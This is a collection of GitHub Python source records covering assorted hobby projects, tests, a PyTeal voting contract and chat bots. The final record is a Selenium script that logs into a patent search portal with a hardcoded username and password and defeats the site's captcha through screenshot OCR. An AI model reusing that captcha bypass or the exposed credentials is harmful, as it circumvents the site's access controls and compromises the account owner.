+{"seq_id":"35299655282","text":"\nimport glob\nimport subprocess\n\n\"\"\"\nCreated on Wed Jul27 20:18:47 2022\n\n@author: Luke Cota\n\nPURPOSE:\n Cleanes up all the unnecissary files created by the pdflatex command\n\nINPUTS:\n List all input here\n\nOUTPUTS:\n src = str, Path to folder which is to be cleaned\n\nDEPENDENCIES:\n NONE\n\nNOTES:\n Some notes here\n\n VARIABLES (Important non IO variables):\n NONE\n\"\"\"\ndef cleanup(src):\n\n extensions = ['.out', '.aux', '.log', '.toc']\n\n for elem in extensions:\n g_cmd = f'*{elem}'\n flist = glob.glob(g_cmd)\n for jelem in flist:\n result = subprocess.run(['rm', jelem])\n\n return\n","repo_name":"lukecota/latex_builder","sub_path":"SRC/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74190549584","text":"\"\"\"\nThis module contains the Window_View superclass for the PySimpleGUI window.\n\nClasses:\n Window_View: The superclass for the PySimpleGUI window.\n\"\"\"\n\n\n# Imports\nimport sys\nsys.dont_write_bytecode = True\nimport PySimpleGUI as sg\n\n\n# Procedures\nclass Window_View():\n \"\"\"\n The superclass for the PySimpleGUI window.\n\n Functions:\n set_theme(): Sets the default PySimpleGUI theme for the program.\n render(): Renders the window.\n accept_input(): Accepts input from the window.\n \"\"\"\n user = None\n view_list = []\n def __init__(self):\n self.window = None\n self.current_layout = []\n self.components = {\"has_components\":False}\n self.controls = []\n Window_View.view_list += [self]\n \n\n def set_theme():\n \"\"\"\n This function sets the default PySimpleGUI theme for the program.\n \"\"\"\n sg.SetOptions(\n background_color='#95D0B3', \n text_element_background_color='#95D0B3',\n text_color=\"#2D6A4F\",\n font='Any 12',\n element_background_color='#D0E9DD',\n input_elements_background_color='#F7F3EC',\n button_color=('white','#2D6A4F'),\n titlebar_background_color='red',\n titlebar_text_color='black'\n )\n\n\n def render(self):\n \"\"\"\n This function renders the window.\n \"\"\"\n # create the form and show it without the plot\n if self.current_layout != [] :\n self.window = sg.Window('Data Scout: Data Set Explorer', self.current_layout, size=(1000, 600), finalize=True)\n \n\n # class static method, level reading\n def accept_input():\n \"\"\"\n This function accepts input from the window.\n \"\"\"\n keep_going = True \n active_view = None \n while keep_going:\n # print(\"----- New Loop -----\")\n window, event, values = sg.read_all_windows()\n # print(\"event: \", event)\n # Find class from window\n for view in Window_View.view_list:\n if view.window == window:\n active_view = view\n # Active view is the window that the event came from\n # Check for window close\n if event == sg.WIN_CLOSED or event == 'Exit':\n keep_going = False\n for accept_control in active_view.controls:\n # Determine loop and handle event\n keep_going = accept_control(event, values, active_view) \n if active_view != None:\n active_view.window.refresh()\n","repo_name":"Jayden-Htn/SDV602-Milestone-3","sub_path":"view/window_view.py","file_name":"window_view.py","file_ext":"py","file_size_in_byte":2620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2756939060","text":"class No:\n def __init__(self, valor):\n self.valor = valor\n self.proximo = None\n\n\ndeque = None\n\n\ndef inserir(n, posicao):\n global deque\n if deque == None:\n deque = No(n)\n else:\n if posicao == 'inicio':\n novoItem = No(n)\n novoItem.proximo = deque\n deque = novoItem\n else:\n indice = deque\n while indice.proximo != None:\n indice = indice.proximo\n indice.proximo = No(n)\n\n\ndef remover(posicao):\n global deque\n if deque == None:\n print('Deque Vazio')\n else:\n if posicao == 'inicio':\n deque = deque.proximo\n else:\n indiceAnt = deque\n indice = deque\n while indice.proximo != None:\n indiceAnt = indice\n indice = indice.proximo\n\n indiceAnt.proximo = indice.proximo\n indice.proximo = None # free\n\n\ndef imprimeDeque(prefixo, deque):\n print('%s[ ' % prefixo, end='')\n\n aux = deque\n while aux != None:\n if aux.proximo == None:\n print('%d ' % aux.valor, end='')\n else:\n print('%d, ' % aux.valor, end='')\n aux = aux.proximo\n\n print(']')\n\n\n# Main\n\n# Testar inserções\nfor valor, posicao in [(2, 'inicio'), (3, 'final'), (4, 'final'), (1, 'inicio')]:\n inserir(valor, posicao)\n imprimeDeque('inserir(%d, %s) \\t= ' % (valor, posicao), deque)\n\nimprimeDeque('deque = ', deque)\n\n# Testar remoção\nfor posicao in ['inicio', 'final', 'final', 'inicio', 'inicio', 'final']:\n remover(posicao)\n imprimeDeque('remover(%s) = ' % posicao, deque)\n\nimprimeDeque('deque = ', deque)\n","repo_name":"ufr-si/ed2020-2","sub_path":"Monitoria/Lista Prática da Unidade III/ex06.py","file_name":"ex06.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"34521615900","text":"from loguru import logger\n\nfrom .compression_transformation import CompressionTransformation\nfrom .image_transformation_base import ImageTransformationBase\nfrom .resize_transformation import ResizeTransformation\nfrom .webp_transformation import WebPTransformation\n\n\ndef create_image_transformations_from_config(config):\n transformations = []\n\n try:\n for t in config.transformation.image:\n name = list(t.keys())[0]\n if \"resize\" == name.lower():\n maxWidth = t[name].maxWidth\n maxHeight = t[name].maxHeight\n resampling = t[name].resampling\n transformations.append(ResizeTransformation(maxWidth, maxHeight, resampling))\n elif \"compress\" == name.lower():\n optimize = t[name].optimize\n dpi = (t[name].dpi, t[name].dpi)\n transformations.append(CompressionTransformation(optimize, dpi))\n elif \"webp\" == name.lower():\n lossless = t[name].lossless\n quality = t[name].quality\n method = t[name].method\n transformations.append(WebPTransformation(lossless, quality, method))\n else:\n raise ValueError(f\"Cannot parse Transformation '{name}'!\")\n return transformations\n except ValueError:\n logger.exception(\"Cannot parse Transformation Config!\")\n","repo_name":"Skoolin/wicsmmirETL","sub_path":"transformations/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5582308074","text":"from copy import deepcopy\ndef toArchitectScale(value):\n whole = 0\n sig = len(str(value))\n \n while value > 1:\n print(value)\n value -= 1\n whole += 1\n value = value*10\n value8 = value*0.8\n value16 = value*1.6\n return (whole, round(value8, sig), round(value, sig), round(value16, sig))\n\n\nx,y,z,t = toArchitectScale(1.33)\nprint( '{0} {1}/8 {0} {2}/10 {0} {3}/16'.format(x,y,z,t))\n","repo_name":"QuantumNovice/PyMathematics","sub_path":"Inch to Architect Scale.py","file_name":"Inch to Architect Scale.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"11279179316","text":"import pygame\r\nimport time\r\nimport random\r\n\r\npygame.init()\r\n\r\n# Set up the screen dimensions\r\nWIDTH, HEIGHT = 800, 600\r\nGRID_SIZE = 20\r\nGRID_WIDTH = WIDTH // GRID_SIZE\r\nGRID_HEIGHT = HEIGHT // GRID_SIZE\r\n\r\n# Colors\r\nBLACK = (0, 0, 0)\r\nWHITE = (255, 255, 255)\r\nRED = (255, 0, 0)\r\n\r\n# Snake direction\r\nUP = (0, -1)\r\nDOWN = (0, 1)\r\nLEFT = (-1, 0)\r\nRIGHT = (1, 0)\r\n\r\n# Initialize the screen\r\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\r\npygame.display.set_caption(\"Snake Game\")\r\n\r\ndef draw_grid():\r\n for x in range(0, WIDTH, GRID_SIZE):\r\n pygame.draw.line(screen, WHITE, (x, 0), (x, HEIGHT))\r\n for y in range(0, HEIGHT, GRID_SIZE):\r\n pygame.draw.line(screen, WHITE, (0, y), (WIDTH, y))\r\n\r\ndef draw_snake(snake):\r\n for segment in snake:\r\n pygame.draw.rect(screen, WHITE, (segment[0] * GRID_SIZE, segment[1] * GRID_SIZE, GRID_SIZE, GRID_SIZE))\r\n\r\ndef draw_apple(apple):\r\n pygame.draw.rect(screen, RED, (apple[0] * GRID_SIZE, apple[1] * GRID_SIZE, GRID_SIZE, GRID_SIZE))\r\n\r\ndef get_random_position():\r\n return random.randint(0, GRID_WIDTH - 1), random.randint(0, GRID_HEIGHT - 1)\r\n\r\ndef main():\r\n snake = [(GRID_WIDTH // 2, GRID_HEIGHT // 2)]\r\n snake_direction = RIGHT\r\n\r\n apple = get_random_position()\r\n\r\n clock = pygame.time.Clock()\r\n\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n quit()\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_UP and snake_direction != DOWN:\r\n snake_direction = UP\r\n elif event.key == pygame.K_DOWN and snake_direction != UP:\r\n snake_direction = DOWN\r\n elif event.key == pygame.K_LEFT and snake_direction != RIGHT:\r\n snake_direction = LEFT\r\n elif event.key == pygame.K_RIGHT and snake_direction != LEFT:\r\n snake_direction = RIGHT\r\n\r\n # Move the snake\r\n head = (snake[0][0] + snake_direction[0], snake[0][1] + snake_direction[1])\r\n snake.insert(0, head)\r\n\r\n # Check if the snake eats the apple\r\n # Check if the snake eats the apple\r\n if tuple(snake[0]) == tuple(apple):\r\n apple = get_random_position()\r\n else:\r\n snake.pop()\r\n\r\n \"\"\"\r\n ----------------------------------------------\r\n if snake[0] == apple:\r\n apple = get_random_position()\r\n else:\r\n snake.pop()\r\n \"\"\"\r\n\r\n # Check for game over conditions\r\n if snake[0][0] < 0 or snake[0][0] >= GRID_WIDTH or snake[0][1] < 0 or snake[0][1] >= GRID_HEIGHT:\r\n pygame.quit()\r\n quit()\r\n\r\n if snake[0] in snake[1:]:\r\n pygame.quit()\r\n quit()\r\n\r\n # Clear the screen\r\n screen.fill(BLACK)\r\n\r\n # Draw elements\r\n draw_grid()\r\n draw_apple(apple)\r\n draw_snake(snake)\r\n\r\n pygame.display.update()\r\n\r\n # Set the game speed (adjust as needed)\r\n clock.tick(10)\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"SOWJANYATILLAPUDI/GCC","sub_path":"snake.py","file_name":"snake.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25794384261","text":"import os\nimport textwrap\n\n\ndef create_tests():\n \"\"\"Creates a new test for every question that doesn't have one.\n \"\"\"\n\n maths_path = os.path.split(os.getcwd())[0]\n questions_path = os.path.join(maths_path, 'questions')\n tests_path = os.path.join(maths_path, 'questions', 'tests')\n\n irrelevant_tests_files = ['__init__.py', 'question_tester.py']\n irrelevant_parts_files = ['__init__.py', 'relationships.py']\n\n test_files = [filename for filename in os.listdir(tests_path) if filename.endswith('py') and filename not in irrelevant_tests_files]\n question_files = [filename for filename in os.listdir(questions_path) if filename.endswith('py') and filename not in irrelevant_parts_files]\n\n for question_file in question_files:\n module_name = os.path.splitext(question_file)[0]\n test_filename = 'test_' + question_file\n\n if test_filename in test_files:\n continue\n\n new_testfile_path = os.path.join(tests_path, test_filename)\n\n with open(new_testfile_path, 'w') as f:\n test_content = textwrap.dedent('''\\\n from .. import relationships, {module_name}\n from .question_tester import question_tester\n\n\n def test_{module_name}():\n question = relationships.parse_structure({module_name})\n question_tester(question)'''.format(module_name=module_name)\n )\n\n f.write(test_content)\n\n\nif __name__ == '__main__':\n create_tests()\n","repo_name":"nebffa/MathsExams","sub_path":"maths/scripts/make_part_tests.py","file_name":"make_part_tests.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"71207891987","text":"import os\n\nfrom ..unittest import TestCase\n\nimport pycassa\n\nfrom ..pysandraunit import PysandraUnit, PysandraUnitServerError\nfrom utils import CassandraPool\n\n_here = lambda x: os.path.join(os.path.dirname(os.path.abspath(__file__)), x)\n\nclass BasicOperationsTest(TestCase):\n\n def setUp(self):\n self.test_schema_yaml = _here('test_schema.yaml')\n self.test_schema_cql = _here('test_schema.cql')\n\n def test_start_clean_stop_no_schema(self):\n p = PysandraUnit()\n p.start()\n p.clean()\n p.stop()\n\n def test_start_clean_connect_stop(self):\n p = PysandraUnit(self.test_schema_yaml)\n servers = p.start()\n\n cp = CassandraPool('testks', servers)\n cp.cf_connect('ascii')\n\n p.clean()\n p.stop()\n\n def test_specify_rpc_port(self):\n port = 9999\n host = 'localhost:%s' % port\n\n p = PysandraUnit(self.test_schema_yaml, rpc_port=port)\n servers = p.start()\n\n self.assertEqual(servers[0], host)\n\n cp = CassandraPool('testks', [host])\n cp.cf_connect('ascii')\n\n p.stop()\n\n\n def test_double_start(self):\n p1 = PysandraUnit()\n p2 = PysandraUnit()\n\n p1.start()\n self.assertRaises(PysandraUnitServerError, p1.start)\n self.assertRaises(PysandraUnitServerError, p2.start)\n p1.stop()\n\n p2.start()\n p2.stop()\n\n def test_cql_schema(self):\n port = 9999\n host = 'localhost:%s' % port\n\n p = PysandraUnit(self.test_schema_cql, rpc_port=port)\n servers = p.start()\n\n self.assertEqual(servers[0], host)\n\n cp = CassandraPool('testks', [host])\n cp.cf_connect('ascii')\n\n p.stop()\n\n def test_local_quorum(self):\n p = PysandraUnit(self.test_schema_cql)\n servers = p.start()\n\n cp = CassandraPool('testks', servers)\n cf = cp.cf_connect('ascii')\n\n self.assertRaises(pycassa.NotFoundException, cf.get, 'test_key', read_consistency_level=pycassa.ConsistencyLevel.LOCAL_QUORUM)\n\n p.stop()\n","repo_name":"hamaxx/pysandra-unit-python","sub_path":"pysandra-unit-python/pysandraunit/tests/basic.py","file_name":"basic.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71635936146","text":"# Test PyTeal Contract\n# Author: Devin Downs\n# Project: GreenHouse Hackathon\n# Date: Summer '22\n\nfrom pyteal import *\n\n\"\"\"\nProposal Program\n@dev: Handles voting between experts on donation proposals\n\"\"\"\n\ndef proposal_approval():\n \n \"\"\"\n Create Global State Arguments\n @dev: Executed when on_creation is called (contract is created)\n \"\"\"\n on_creation = Seq(\n [\n App.globalPut(Bytes(\"Creator\"), Txn.sender()), # Store contract creator address\n Assert(Txn.application_args.length() == Int(13)), # Check we have exactly 4 application args (fail if != 4)\n App.globalPut(Bytes(\"RegBegin\"), Btoi(Txn.application_args[0])),\n App.globalPut(Bytes(\"RegEnd\"), Btoi(Txn.application_args[1])),\n App.globalPut(Bytes(\"VoteBegin\"), Btoi(Txn.application_args[2])),\n App.globalPut(Bytes(\"VoteEnd\"), Btoi(Txn.application_args[3])),\n\n # Experts 1-5, value passed is public address\n App.globalPut(Bytes(\"Expert-1\"), Btoi(Txn.application_args[4])),\n App.globalPut(Bytes(\"Expert-2\"), Btoi(Txn.application_args[5])),\n App.globalPut(Bytes(\"Expert-3\"), Btoi(Txn.application_args[6])),\n App.globalPut(Bytes(\"Expert-4\"), Btoi(Txn.application_args[7])),\n App.globalPut(Bytes(\"Expert-5\"), Btoi(Txn.application_args[8])),\n\n # Organization Addresses\n App.globalPut(Bytes(\"Org_Address_1\"), Btoi(Txn.application_args[9])),\n App.globalPut(Bytes(\"Org_Address_2\"), Btoi(Txn.application_args[10])),\n\n # Organization Allocations\n App.globalPut(Bytes(\"Org_Percent_1\"), Btoi(Txn.application_args[11])),\n App.globalPut(Bytes(\"Org_Percent_2\"), Btoi(Txn.application_args[12])),\n\n Return(Int(1)),\n ]\n )\n\n # Check if the transaction sender is the contract creator\n is_creator = Txn.sender() == App.globalGet(Bytes(\"Creator\"))\n\n # Check if the transaction sender is an expert\n is_expert = Cond(\n [Txn.sender() == App.globalGet(Bytes(\"Expert-1\")), Int(1)],\n [Txn.sender() == App.globalGet(Bytes(\"Expert-2\")), Int(1)],\n [Txn.sender() == App.globalGet(Bytes(\"Expert-3\")), Int(1)],\n [Txn.sender() == App.globalGet(Bytes(\"Expert-4\")), Int(1)],\n [Txn.sender() == App.globalGet(Bytes(\"Expert-5\")), Int(1)]\n )\n\n \"\"\"\"\n Optin-In Functionality\n @dev: Called when users opt-in to contract\n @returns: TRUE if current round falls between RegBegin/RegEnd, else FALSE\n \"\"\"\n on_register = Return(\n And(\n Global.round() >= App.globalGet(Bytes(\"RegBegin\")),\n Global.round() <= App.globalGet(Bytes(\"RegEnd\")),\n )\n )\n\n\n \"\"\"\n Close Out Functionality\n @dev: Called when users want to remove smart contract from balance record\n Records the users vote, and adds this to the global state\n @return: TRUE if user successfully closes out\n \"\"\"\n get_vote_of_sender = App.localGetEx(Int(0), App.id(), Bytes(\"voted\"))\n\n on_closeout = Seq(\n [\n get_vote_of_sender,\n If(\n And(\n Global.round() <= App.globalGet(Bytes(\"VoteEnd\")), # voting is still allowed\n get_vote_of_sender.hasValue(), # user has voted\n ),\n App.globalPut(\n get_vote_of_sender.value(),\n App.globalGet(get_vote_of_sender.value()) - Int(1),\n ),\n ),\n Return(Int(1)),\n ]\n )\n\n\n\n \"\"\"\n Voting Functionality\n @dev: allows the user vote to be stored in global state\n @returns: TRUE if user passes ASSERTS and vote is tallied\n FALSE if voting has ended or user already voted\n \"\"\"\n choice = Txn.application_args[1]\n choice_tally = App.globalGet(choice)\n on_vote = Seq(\n [\n Assert(\n And(\n Global.round() >= App.globalGet(Bytes(\"VoteBegin\")), # Check if current round is within the voting period\n Global.round() <= App.globalGet(Bytes(\"VoteEnd\")),\n is_expert\n )\n ),\n get_vote_of_sender, # Check if user already voted\n If(get_vote_of_sender.hasValue(), Return(Int(0))),\n App.globalPut(choice, choice_tally + Int(1)),\n App.localPut(Int(0), Bytes(\"voted\"), choice),\n Return(Int(1)),\n ]\n )\n\n\n\n \"\"\"\n Payment Functionality\n @dev: Once a proposal has passed, we send the two \n organizations the amount of Algo voted on\n \"\"\"\n on_passed = Seq(\n [\n Assert(And(\n App.globalGet(Bytes(\"Org_Address_1\")).hasValue(),\n App.globalGet(Bytes(\"Org_Address_2\")).hasValue(),\n App.globalGet(Bytes(\"Org_Percent_1\")).hasValue(),\n App.globalGet(Bytes(\"Org_Percent_2\")).hasValue()\n )),\n Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n TxnField.type_enum: TxnType.Payment,\n TxnField.receiver: Substring(App.globalGet(Bytes(\"Org_Address_1\")), Int(0), Int(32)),\n TxnField.amount: Btoi(Substring(App.globalGet(Bytes(\"Org_Percent_1\")), Int(32), Int(40)))\n }),\n InnerTxnBuilder.Submit(),\n ]),\n Seq([\n InnerTxnBuilder.Begin(),\n InnerTxnBuilder.SetFields({\n TxnField.type_enum: TxnType.Payment,\n TxnField.receiver: Substring(App.globalGet(Bytes(\"Org_Address_2\")), Int(0), Int(32)),\n TxnField.amount: Btoi(Substring(App.globalGet(Bytes(\"Org_Percent_2\")), Int(32), Int(40)))\n }),\n InnerTxnBuilder.Submit(),\n ])\n ])\n\n\n\n \"\"\"\n OnComplete Conditions\n @dev: Checks all conditions in 'Cond()' before executing\n \"\"\"\n program = Cond(\n [Txn.application_id() == Int(0), on_creation],\n [Txn.on_completion() == OnComplete.DeleteApplication, Return(is_creator)],\n [Txn.on_completion() == OnComplete.UpdateApplication, Return(is_creator)],\n [Txn.on_completion() == OnComplete.CloseOut, on_closeout],\n [Txn.on_completion() == OnComplete.OptIn, on_register],\n [Txn.application_args[0] == Bytes(\"vote\"), on_vote],\n [Txn.application_args[0] == Bytes(\"\"), on_passed]\n )\n return program\n\n\n\n\n\"\"\"\nClear State Program\n@dev: Used only for clearing local user state \n\"\"\"\ndef clear_state_program():\n get_vote_of_sender = App.localGetEx(Int(0), App.id(), Bytes(\"voted\"))\n program = Seq(\n [\n get_vote_of_sender,\n If(\n And(\n Global.round() <= App.globalGet(Bytes(\"VoteEnd\")),\n get_vote_of_sender.hasValue(),\n ),\n App.globalPut(\n get_vote_of_sender.value(),\n App.globalGet(get_vote_of_sender.value()) - Int(1),\n ),\n ),\n Return(Int(1)),\n ]\n )\n\n return program\n\n\n\n# Compilation Helper\nif __name__ == \"__main__\":\n with open(\"proposal_approval.teal\", \"w\") as f:\n compiled = compileTeal(proposal_approval(), mode=Mode.Application, version=5)\n f.write(compiled)\n \n with open(\"vote_clear_state.teal\", \"w\") as f:\n compiled = compileTeal(clear_state_program(), mode=Mode.Application, version=5)\n f.write(compiled)","repo_name":"downsd16/TFHExpertAdvisedFund","sub_path":"contracts/proposal_contract.py","file_name":"proposal_contract.py","file_ext":"py","file_size_in_byte":7771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35860380402","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport vk_api\nfrom vk_api.longpoll import VkLongPoll, VkEventType\nfrom random import randint\nfrom response import response\n#import MySQLdb\nimport datetime\nimport requests\nfrom login import isLogin, isAdmin, login\n#from secret import tokenVK #вынес пароль в отдельный файл\nfrom admin import adminresponce\nimport bs4\n\n#from tokens import generateUsers, getTokens\n\nkeyb=\"\"\"{\n \"one_time\": false,\n \"buttons\": [\n [{\n \"action\": {\n \"type\": \"text\",\n \"label\": \"Nice answer!\"\n },\n \"color\": \"positive\"\n },\n {\n \"action\": {\n \"type\": \"text\",\n \"label\": \"Normal answer.\"\n },\n \"color\": \"positive\"\n }],\n [{\n \"action\": {\n \"type\": \"text\",\n \"label\": \"Bad answer!\"\n },\n \"color\": \"default\"\n }]\n ]\n}\"\"\"\n\n\nusernames = dict()\n\ndef get_name(user_id):\n if user_id in usernames:\n return usernames[user_id]\n usernames[user_id] = str(_get_user_name_from_vk_id(user_id))\n return usernames[user_id]\n\n\ndef _get_user_name_from_vk_id(user_id):\n request = requests.get(\"https://vk.com/id\"+str(user_id))\n bs = bs4.BeautifulSoup(request.text, \"html.parser\")\n user_name = str(bs.findAll(\"title\")[0])\n user_name = user_name.replace(\"\",\"\")\n return user_name.split()[0]\n\n\ndef main():\n badansw=0\n normalansw=0\n niceansw=0\n print(\"start\")\n\n tok = 'PUT UR VK TOKEN HERE'\n vk_session = vk_api.VkApi(token=tok)\n\n longpoll = VkLongPoll(vk_session)\n vk = vk_session.get_api()\n\n for event in longpoll.listen():\n if event.type == VkEventType.MESSAGE_NEW and event.to_me and event.text:\n text = str(event.text)\n time = str(datetime.datetime.now())\n time = time[:19]\n \n\n if isAdmin(str(event.user_id)):\n try:\n print(str(event.user_id)+\" \"+text)\n res = str(get_name(event.user_id))+\", \"+adminresponce(text)\n vk.messages.send(user_id = event.user_id, message = res, random_id = randint(0, 9999),keyboard=keyb)\n except Exception as e:\n requests.post(\"http://danr0.pythonanywhere.com/api/err/\", data = str(event.user_id)+\"$\"+str(e)+\"$\"+time)\n print(str(e))\n elif isLogin(str(event.user_id)):\n try:\n print(str(event.user_id)+\" \"+text)\n if text == \"Nice answer!\":\n niceansw+=1\n res=\"Уже \"+str(niceansw)+\" nice answers\"\n elif text == \"Bad answer!\":\n badansw+=1\n res=\"Уже \"+str(badansw)+\" bad answers\"\n elif text == \"Normal answer.\":\n normalansw+=1\n res=\"Уже \"+str(normalansw)+\" normal answers\"\n else:\n text = text.replace(\"\\n\",'')\n res = get_name(event.user_id)+\", \"+response(text)#заглушка со стандартнами ответами, потом сюда прикрутим нормальные ответы\n vk.messages.send(user_id = event.user_id, message = res, random_id = randint(0, 9999),keyboard=keyb)\n except Exception as e:\n #логирование ошибок\n requests.post(\"http://danr0.pythonanywhere.com/api/err/\", data = str(event.user_id)+\"$\"+str(e)+\"$\"+time)\n print(str(e))\n else:\n try:\n res = login(str(event.user_id), text)\n vk.messages.send(user_id = event.user_id, message = res, random_id = randint(0, 9999),keyboard=keyb)\n print(str(event.user_id)+\" \"+text)\n except Exception as e:\n #логирование ошибок\n requests.post(\"http://danr0.pythonanywhere.com/api/err/\", data = str(event.user_id)+\"$\"+str(e)+\"$\"+time)\n print(str(e))\n\n\nif __name__ == '__main__':\n print(\"start the bot\")\n main()","repo_name":"Danr0/VKbot","sub_path":"project/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":4162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725210706","text":"\"\"\"\nInput: numerator = 2, denominator = 1\nOutput: \"2\"\nExample 3:\n\n无限循环小数应该这样处理\nInput: numerator = 2, denominator = 3\nOutput: \"0.(6)\"\n\"\"\"\n\nclass Solution(object):\n def fractionToDecimal(self, numerator, denominator):\n \"\"\"\n :type numerator: int\n :type denominator: int\n :rtype: str\n \"\"\"\n num = numerator\n den = denominator\n\n # 分母为0\n if not den:\n return\n\n # 分子为0\n if not num:\n return \"0\"\n\n res = []\n if num * den < 0:\n res.append(\"-\")\n\n num, den = abs(num), abs(den)\n res.append(str(num//den))\n\n # 看是否存在余数\n rmd = num % den\n\n #如果没有余数,返回整数结果\n if not rmd:\n return \"\".join(res)\n\n #无返回的话说明有余数,且需要进入到小数位\n res.append(\".\")\n\n # 余数:余数之前在res从左往右数的第几位出现\n dic = {}\n\n # 假如说还存在余数,说明没除完,循环继续下去\n while rmd:\n # 假如余数出现之前出现过了,说明出现了循环小数,例如1.3333\n if rmd in dic:\n # 那么我们在res里加上,( 重复的余数 )\n res.insert(dic[rmd], \"(\")\n res.append(\")\")\n break\n\n # 记录当前余数,以及它出现的位置\n dic[rmd] = len(res)\n # 更新被除数\n div = rmd*10 // den\n # 更新余数\n rmd = rmd*10 % den\n res.append(str(div))\n\n\n return \"\".join(res)\n\n\n\"\"\"\n思路:https://www.youtube.com/watch?v=WJMrceU-ujs\n答案:https://leetcode.com/problems/fraction-to-recurring-decimal/discuss/51187/Python-easy-to-understand-solution-with-comments.\n答案:\n\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Math/166.输出递归小数.py","file_name":"166.输出递归小数.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14614668945","text":"################################################################################\n# #\n# Unique Players ZDStack Plugin #\n# #\n# This plugin kicks players with non-unique names. #\n# #\n# Because ZDaemon does not log player IP addresses along with their actions, #\n# if more than one player in a server has the same name, ZDStack can't #\n# discern which of them the action belongs to. This plugin immediately #\n# removes players with non-unique names, ensuring that statistics are #\n# assigned correctly. It is highly recommended that this plugin be enabled #\n# whenever events are enabled (of course, plugins must be enabled as well). #\n# #\n################################################################################\n\nfrom __future__ import with_statement\n\ndef unique_players(event, zserv):\n ###\n # Really, this should monkeypatch PlayersList.add() for every zserv.\n ###\n if not event.type == 'player_lookup':\n return\n reason = \"Player names must unique, %s is already in use\"\n player_name = event.data['player_name']\n found = False\n with zserv.players.lock:\n for p in zserv.players:\n if p.name == player_name:\n found = found or p.ip\n if p.ip != found:\n ###\n # We don't want to kick players who rejoin while their old\n # connection is timing out... this plugin would kick the\n # actual player and leave the \"ghost\" player. So players\n # with the same name and also the same IP address are\n # allowed. Most of the time this shouldn't happen, because\n # PlayersList.add() figures out if a player's reconnected\n # or not already - this is just to be safe.\n #\n # It would be nice if we set a timer on the new player\n # though; if the old player doesn't disconnect in say...\n # 60 seconds, the new player is kicked.\n #\n # At this point, the name is non-unique.\n ###\n zserv.zkick(p.number, reason % (p.name))\n break\n\n","repo_name":"camgunz/zdstack","sub_path":"plugins/unique_players.py","file_name":"unique_players.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"434592117","text":"# -*- coding: utf-8 -*-\r\n# python 3.7.0\r\n#\r\nimport re\r\nimport requests\r\nimport pytesseract\r\nfrom selenium import webdriver\r\nfrom PIL import Image, ImageEnhance\r\nimport time\r\nfrom selenium.webdriver.common.by import By\r\n\r\n\r\ndriver = webdriver.Chrome()\r\ndriver.maximize_window()\r\ndriver.get(\"http://zlxx.gzgs.gov.cn/pubsearch/portal/uilogin-forwardLogin.shtml\")\r\ndriver.implicitly_wait(30)\r\n# 用户名和密码\r\ndriver.find_element(by=By.NAME, value='j_username').send_keys('scany_')\r\ndriver.find_element(by=By.ID, value='j_password_show').send_keys('Scany0605!!!')\r\n\r\n# 识别验证码\r\npic = driver.find_element(by=By.ID, value=\"j_validation_code\")\r\n# 清空验证码输入框\r\ndriver.find_element(by=By.ID, value=\"j_validation_code\").clear()\r\n# 截图或验证码图片保存地址\r\nscreenImg = r\"E:\\Pic.png\"\r\n# 浏览器页面截屏\r\ndriver.get_screenshot_as_file(screenImg)\r\n# 定位验证码位置及大小\r\nlocation = driver.find_element(by=By.ID, value='codePic').location\r\nsize = driver.find_element(by=By.ID, value='codePic').size\r\nprint(location, size)\r\n# 根据截图修改截图位置\r\nleft = location['x']+230\r\ntop = location['y']+80\r\nright = location['x'] + size['width']+300\r\nbottom = location['y'] + size['height']+100\r\n# 从文件读取截图,截取验证码位置\r\nprint(left, top, right, bottom)\r\nimg = Image.open(screenImg).crop((left, top, right, bottom))\r\n# 对图片做一些处理\r\nimg = img.convert('RGBA') # 转换模式:L | RGB\r\nimg = img.convert('L') # 转换模式:L | RGB\r\nimg = ImageEnhance.Contrast(img) # 增强对比度\r\nimg = img.enhance(2.0) # 增加饱和度\r\nimg.save(screenImg)\r\n# 再次读取识别验证码\r\nimg = Image.open(screenImg)\r\ncode = pytesseract.image_to_string(img)\r\n\r\n# 识别出来验证码去特殊符号\r\nb = ''\r\nfor i in code.strip():\r\n pattern = re.compile(r'[a-zA-Z0-9]')\r\n m = pattern.search(i)\r\n if m != None:\r\n b += i\r\n\r\n# 把b的值输入验证码输入框\r\ndriver.find_element(by=By.ID, value=\"j_validation_code\").send_keys(b)\r\n# 点击登录按钮\r\ndriver.find_element(by=By.XPATH, value='//*[@id=\"loginForm\"]/div[5]/a').click()\r\n# 